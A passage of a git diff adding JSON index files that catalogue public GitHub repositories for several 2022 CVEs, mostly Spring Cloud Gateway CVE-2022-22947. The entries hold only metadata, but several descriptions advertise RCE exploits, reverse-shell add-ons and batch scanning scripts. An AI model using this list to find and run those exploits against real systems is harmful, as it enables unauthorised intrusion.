"watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22852.json b/2022/CVE-2022-22852.json new file mode 100644 index 0000000000..7d4102d513 --- /dev/null +++ b/2022/CVE-2022-22852.json @@ -0,0 +1,33 @@ +[ + { + "id": 451155350, + "name": "CVE-2022-22852", + "full_name": "Sant268\/CVE-2022-22852", + "owner": { + "login": "Sant268", + "id": 26564273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4", + "html_url": "https:\/\/github.com\/Sant268", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22852", + "description": null, + "fork": false, + "created_at": "2022-01-23T16:01:49Z", + "updated_at": "2022-01-24T06:20:48Z", + "pushed_at": "2022-01-27T03:04:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22885.json b/2022/CVE-2022-22885.json new file mode 100644 index 0000000000..8a2e05404b --- /dev/null +++ b/2022/CVE-2022-22885.json @@ -0,0 +1,64 @@ +[ + { + "id": 786354615, + "name": "CVE-2022-22885-2", + "full_name": "miguelc49\/CVE-2022-22885-2", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-22885-2", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:50Z", + "updated_at": "2024-04-14T17:39:07Z", + "pushed_at": "2024-04-16T00:44:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786354643, + "name": "CVE-2022-22885-1", + "full_name": "miguelc49\/CVE-2022-22885-1", + "owner": { + "login": "miguelc49", + "id": 158234444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158234444?v=4", + "html_url": "https:\/\/github.com\/miguelc49", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miguelc49\/CVE-2022-22885-1", + "description": null, + "fork": false, + "created_at": "2024-04-14T07:38:59Z", + "updated_at": "2024-04-14T17:39:04Z", + "pushed_at": "2024-04-16T00:44:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22909.json b/2022/CVE-2022-22909.json new file mode 100644 index 0000000000..454d190823 --- /dev/null +++ b/2022/CVE-2022-22909.json @@ -0,0 +1,64 @@ +[ + { + "id": 460534370, + "name": "CVE-2022-22909", + "full_name": "0z09e\/CVE-2022-22909", + "owner": { + "login": "0z09e", + "id": 62566206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62566206?v=4", + "html_url": "https:\/\/github.com\/0z09e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0z09e\/CVE-2022-22909", + "description": "Hotel Druid 3.0.3 Code Injection to Remote Code Execution", + "fork": false, + "created_at": "2022-02-17T17:18:02Z", + "updated_at": "2023-12-20T05:13:56Z", + "pushed_at": "2022-10-31T16:28:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469830978, + "name": "CVE-2022-22909", + "full_name": "kaal18\/CVE-2022-22909", + "owner": { + "login": "kaal18", + "id": 55247170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55247170?v=4", + "html_url": "https:\/\/github.com\/kaal18", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaal18\/CVE-2022-22909", + "description": " Exploits for Hotel Druid 3.0.3 - Remote Code Execution (RCE) CVE-2022-22909", + "fork": false, + "created_at": "2022-03-14T17:10:08Z", + "updated_at": "2024-08-12T20:21:33Z", + "pushed_at": "2022-03-14T18:02:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22916.json b/2022/CVE-2022-22916.json new file mode 100644 index 0000000000..9cc30aa1a5 --- /dev/null +++ b/2022/CVE-2022-22916.json @@ -0,0 +1,33 @@ +[ + { + "id": 494836607, + "name": "CVE-2022-22916", + "full_name": "0x7eTeam\/CVE-2022-22916", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2022-22916", + "description": "CVE-2022-22916,O2OA RCE 远程命令执行", + "fork": false, + "created_at": "2022-05-21T16:28:23Z", + "updated_at": "2024-08-12T20:23:27Z", + "pushed_at": "2022-05-21T19:10:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22947.json b/2022/CVE-2022-22947.json new file mode 100644 index 0000000000..f1b82cb2e5 --- /dev/null +++ b/2022/CVE-2022-22947.json @@ -0,0 +1,1749 @@ +[ + { + "id": 465286921, + "name": "Spring-Cloud-Gateway-CVE-2022-22947", + "full_name": "lucksec\/Spring-Cloud-Gateway-CVE-2022-22947", + "owner": { + "login": "lucksec", + "id": 59011386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59011386?v=4", + "html_url": "https:\/\/github.com\/lucksec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lucksec\/Spring-Cloud-Gateway-CVE-2022-22947", + "description": "CVE-2022-22947", + "fork": false, + "created_at": "2022-03-02T11:58:55Z", + "updated_at": "2024-11-07T07:33:56Z", + "pushed_at": "2022-03-03T14:03:30Z", + "stargazers_count": 220, + "watchers_count": 220, + "has_discussions": false, + "forks_count": 59, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 59, + "watchers": 220, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 465652006, + "name": "cve-2022-22947", + "full_name": "scopion\/cve-2022-22947", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/cve-2022-22947", + "description": "poc for cve-2022-22947", + "fork": false, + "created_at": "2022-03-03T09:30:37Z", + "updated_at": "2022-03-03T09:27:45Z", + "pushed_at": "2022-03-03T09:27:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465686911, + "name": "spring-cve-2022-22947", + "full_name": "Vulnmachines\/spring-cve-2022-22947", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/spring-cve-2022-22947", + "description": "Spring cloud gateway code injection : CVE-2022-22947", + "fork": false, + "created_at": "2022-03-03T11:14:37Z", + "updated_at": "2024-02-01T01:28:59Z", + "pushed_at": "2022-03-03T11:27:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465724885, + "name": "CVE-2022-22947_Rce_Exp", + "full_name": "Axx8\/CVE-2022-22947_Rce_Exp", + "owner": { + "login": "Axx8", + "id": 34683107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4", + "html_url": "https:\/\/github.com\/Axx8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axx8\/CVE-2022-22947_Rce_Exp", + "description": "Spring Cloud Gateway 远程代码执行漏洞Exp Spring_Cloud_Gateway_RCE_Exp-CVE-2022-22947", + "fork": false, + "created_at": "2022-03-03T13:13:02Z", + "updated_at": "2024-08-12T20:21:12Z", + "pushed_at": "2022-11-14T01:34:04Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 75, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465838791, + "name": "CVE-2022-22947", + "full_name": "crowsec-edtech\/CVE-2022-22947", + "owner": { + "login": "crowsec-edtech", + "id": 97851186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4", + "html_url": "https:\/\/github.com\/crowsec-edtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crowsec-edtech\/CVE-2022-22947", + "description": "Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)", + "fork": false, + "created_at": "2022-03-03T18:26:18Z", + "updated_at": "2024-08-12T20:21:12Z", + "pushed_at": "2022-03-04T21:10:45Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465862037, + "name": "SpringCloudGatewayRCE", + "full_name": "Tas9er\/SpringCloudGatewayRCE", + "owner": { + "login": "Tas9er", + "id": 57090266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57090266?v=4", + "html_url": "https:\/\/github.com\/Tas9er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tas9er\/SpringCloudGatewayRCE", + "description": "SpringCloudGatewayRCE - CVE-2022-22947 \/ Code By:Tas9er", + "fork": false, + "created_at": "2022-03-03T19:45:18Z", + "updated_at": "2024-09-27T09:14:40Z", + "pushed_at": "2022-03-03T20:44:25Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 26, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 465954802, + "name": "CVE-2022-22947", + "full_name": "Greetdawn\/CVE-2022-22947", + "owner": { + "login": "Greetdawn", + "id": 28551913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28551913?v=4", + "html_url": "https:\/\/github.com\/Greetdawn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greetdawn\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-04T02:27:50Z", + "updated_at": "2023-07-18T07:26:20Z", + "pushed_at": "2022-03-04T03:22:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465956696, + "name": "Spring-Cloud-Gateway-CVE-2022-22947", + "full_name": "Summer177\/Spring-Cloud-Gateway-CVE-2022-22947", + "owner": { + "login": "Summer177", + "id": 37724670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37724670?v=4", + "html_url": "https:\/\/github.com\/Summer177", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Summer177\/Spring-Cloud-Gateway-CVE-2022-22947", + "description": "Spring Cloud Gateway远程代码执行漏洞", + "fork": false, + "created_at": "2022-03-04T02:36:02Z", + "updated_at": "2022-03-04T02:46:40Z", + "pushed_at": "2022-03-04T05:19:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465993918, + "name": "CVE-2022-22947", + "full_name": "BerMalBerIst\/CVE-2022-22947", + "owner": { + "login": "BerMalBerIst", + "id": 97208820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97208820?v=4", + "html_url": "https:\/\/github.com\/BerMalBerIst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BerMalBerIst\/CVE-2022-22947", + "description": "Exp", + "fork": false, + "created_at": "2022-03-04T05:26:33Z", + "updated_at": "2023-01-09T05:36:31Z", + "pushed_at": "2022-03-04T05:33:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466011549, + "name": "CVE-2022-22947-Spring-Cloud-Gateway", + "full_name": "tangxiaofeng7\/CVE-2022-22947-Spring-Cloud-Gateway", + "owner": { + "login": "tangxiaofeng7", + "id": 45926593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926593?v=4", + "html_url": "https:\/\/github.com\/tangxiaofeng7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tangxiaofeng7\/CVE-2022-22947-Spring-Cloud-Gateway", + "description": "CVE-2022-22947批量", + "fork": false, + "created_at": "2022-03-04T06:38:26Z", + "updated_at": "2024-11-16T19:48:38Z", + "pushed_at": "2022-03-04T10:49:00Z", + "stargazers_count": 71, + "watchers_count": 71, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 71, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 466024451, + "name": "-cve-2022-22947-", + "full_name": "dingxiao77\/-cve-2022-22947-", + "owner": { + "login": "dingxiao77", + "id": 56961158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56961158?v=4", + "html_url": "https:\/\/github.com\/dingxiao77", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dingxiao77\/-cve-2022-22947-", + "description": " cve-2022-22947 spring cloud gateway 批量扫描脚本", + "fork": false, + "created_at": "2022-03-04T07:24:58Z", + "updated_at": "2024-08-12T20:21:13Z", + "pushed_at": "2022-03-04T08:14:45Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466061651, + "name": "CVE-2022-22947-goby", + "full_name": "flying0er\/CVE-2022-22947-goby", + "owner": { + "login": "flying0er", + "id": 16277259, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16277259?v=4", + "html_url": "https:\/\/github.com\/flying0er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flying0er\/CVE-2022-22947-goby", + "description": "日常更新一些顺手写的gobypoc,包含高危害EXP", + "fork": false, + "created_at": "2022-03-04T09:29:45Z", + "updated_at": "2022-03-04T09:29:42Z", + "pushed_at": "2022-03-04T05:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466067213, + "name": "CVE-2022-22947", + "full_name": "dbgee\/CVE-2022-22947", + "owner": { + "login": "dbgee", + "id": 46910972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46910972?v=4", + "html_url": "https:\/\/github.com\/dbgee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dbgee\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API 远程命令执行 CVE-2022-22947", + "fork": false, + "created_at": "2022-03-04T09:47:55Z", + "updated_at": "2022-03-07T16:39:03Z", + "pushed_at": "2022-03-04T09:54:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466074286, + "name": "cve-2022-22947", + "full_name": "nu0l\/cve-2022-22947", + "owner": { + "login": "nu0l", + "id": 54735907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54735907?v=4", + "html_url": "https:\/\/github.com\/nu0l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nu0l\/cve-2022-22947", + "description": "Spring-Cloud-Gateway-CVE-2022-22947", + "fork": false, + "created_at": "2022-03-04T10:10:12Z", + "updated_at": "2023-01-21T10:36:54Z", + "pushed_at": "2022-03-04T10:33:41Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466102092, + "name": "CVE-2022-22947-POC", + "full_name": "nanaao\/CVE-2022-22947-POC", + "owner": { + "login": "nanaao", + "id": 77666853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77666853?v=4", + "html_url": "https:\/\/github.com\/nanaao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nanaao\/CVE-2022-22947-POC", + "description": "CVE-2022-22947批量检测脚本,回显命令没进行正则,大佬们先用着,后续再更", + "fork": false, + "created_at": "2022-03-04T11:45:35Z", + "updated_at": "2024-08-12T20:21:13Z", + "pushed_at": "2022-03-04T11:36:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 466164154, + "name": "CVE-2022-22947-Rce_POC", + "full_name": "hunzi0\/CVE-2022-22947-Rce_POC", + "owner": { + "login": "hunzi0", + "id": 57057346, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57057346?v=4", + "html_url": "https:\/\/github.com\/hunzi0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hunzi0\/CVE-2022-22947-Rce_POC", + "description": "批量url检测Spring-Cloud-Gateway-CVE-2022-22947", + "fork": false, + "created_at": "2022-03-04T14:58:02Z", + "updated_at": "2024-08-12T20:21:14Z", + "pushed_at": "2022-03-04T15:15:43Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466368589, + "name": "CVE-2022-22947", + "full_name": "22ke\/CVE-2022-22947", + "owner": { + "login": "22ke", + "id": 39191639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39191639?v=4", + "html_url": "https:\/\/github.com\/22ke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/22ke\/CVE-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-05T06:19:46Z", + "updated_at": "2022-03-07T06:26:50Z", + "pushed_at": "2022-03-05T06:39:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 466986315, + "name": "CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE", + "full_name": "M0ge\/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE", + "owner": { + "login": "M0ge", + "id": 62680449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62680449?v=4", + "html_url": "https:\/\/github.com\/M0ge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M0ge\/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE", + "description": "Spring Cloud Gateway远程代码执行漏洞POC,基于命令执行的基础上,增加了反弹shell操作", + "fork": false, + "created_at": "2022-03-07T07:24:13Z", + "updated_at": "2024-07-19T05:25:14Z", + "pushed_at": "2022-03-09T05:43:23Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467021913, + "name": "SpEL", + "full_name": "YutuSec\/SpEL", + "owner": { + "login": "YutuSec", + "id": 41934714, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41934714?v=4", + "html_url": "https:\/\/github.com\/YutuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YutuSec\/SpEL", + "description": "Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)批量检测工具", + "fork": false, + "created_at": "2022-03-07T09:14:50Z", + "updated_at": "2024-08-12T20:21:19Z", + "pushed_at": "2022-03-08T02:09:38Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467073196, + "name": "CVE-2022-22947", + "full_name": "Jun-5heng\/CVE-2022-22947", + "owner": { + "login": "Jun-5heng", + "id": 88525975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88525975?v=4", + "html_url": "https:\/\/github.com\/Jun-5heng", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jun-5heng\/CVE-2022-22947", + "description": "SpringCloudGatewayRCE \/ Code By:Jun_sheng", + "fork": false, + "created_at": "2022-03-07T11:53:51Z", + "updated_at": "2022-11-08T08:59:28Z", + "pushed_at": "2022-03-29T06:10:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467145231, + "name": "cve-2022-22947", + "full_name": "darkb1rd\/cve-2022-22947", + "owner": { + "login": "darkb1rd", + "id": 78224070, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78224070?v=4", + "html_url": "https:\/\/github.com\/darkb1rd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darkb1rd\/cve-2022-22947", + "description": null, + "fork": false, + "created_at": "2022-03-07T15:12:45Z", + "updated_at": "2022-11-30T04:44:51Z", + "pushed_at": "2022-03-07T15:28:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467171493, + "name": "CVE-2022-22947", + "full_name": "mrknow001\/CVE-2022-22947", + "owner": { + "login": "mrknow001", + "id": 46807619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46807619?v=4", + "html_url": "https:\/\/github.com\/mrknow001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrknow001\/CVE-2022-22947", + "description": "Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)", + "fork": false, + "created_at": "2022-03-07T16:24:42Z", + "updated_at": "2023-06-05T02:20:08Z", + "pushed_at": "2022-03-08T07:05:18Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467446398, + "name": "CVE-2022-22947", + "full_name": "0x7eTeam\/CVE-2022-22947", + "owner": { + "login": "0x7eTeam", + "id": 96908273, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96908273?v=4", + "html_url": "https:\/\/github.com\/0x7eTeam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7eTeam\/CVE-2022-22947", + "description": "CVE-2022-22947_EXP,CVE-2022-22947_RCE,CVE-2022-22947反弹shell,CVE-2022-22947 getshell", + "fork": false, + "created_at": "2022-03-08T09:32:36Z", + "updated_at": "2024-08-12T20:21:22Z", + "pushed_at": "2022-03-08T09:36:31Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467458148, + "name": "Spring-Cloud-GateWay-CVE-2022-22947-demon-code", + "full_name": "ba1ma0\/Spring-Cloud-GateWay-CVE-2022-22947-demon-code", + "owner": { + "login": "ba1ma0", + "id": 32502627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32502627?v=4", + "html_url": "https:\/\/github.com\/ba1ma0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ba1ma0\/Spring-Cloud-GateWay-CVE-2022-22947-demon-code", + "description": "调试代码包含断点信息,直接导入即可进行调试", + "fork": false, + "created_at": "2022-03-08T10:07:54Z", + "updated_at": "2022-03-09T07:44:58Z", + "pushed_at": "2022-03-09T07:44:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 468185090, + "name": "CVE-2022-22947_exp", + "full_name": "Arrnitage\/CVE-2022-22947_exp", + "owner": { + "login": "Arrnitage", + "id": 48816467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48816467?v=4", + "html_url": "https:\/\/github.com\/Arrnitage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Arrnitage\/CVE-2022-22947_exp", + "description": "CVE-2022-22947 Exploit script", + "fork": false, + "created_at": "2022-03-10T03:51:47Z", + "updated_at": "2024-08-12T20:21:25Z", + "pushed_at": "2022-03-10T08:43:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 468214144, + "name": "Spring-CVE-2022-22947-", + "full_name": "PaoPaoLong-lab\/Spring-CVE-2022-22947-", + "owner": { + "login": "PaoPaoLong-lab", + "id": 76150756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76150756?v=4", + "html_url": "https:\/\/github.com\/PaoPaoLong-lab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PaoPaoLong-lab\/Spring-CVE-2022-22947-", + "description": null, + "fork": false, + "created_at": "2022-03-10T06:01:32Z", + "updated_at": "2022-03-10T10:46:36Z", + "pushed_at": "2022-03-10T10:46:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468567023, + "name": "cve-2022-22947-docker", + "full_name": "hh-hunter\/cve-2022-22947-docker", + "owner": { + "login": "hh-hunter", + "id": 91593280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4", + "html_url": "https:\/\/github.com\/hh-hunter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hh-hunter\/cve-2022-22947-docker", + "description": "cve-2022-22947-docker", + "fork": false, + "created_at": "2022-03-11T01:27:55Z", + "updated_at": "2022-03-11T01:27:55Z", + "pushed_at": "2022-03-11T02:53:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + 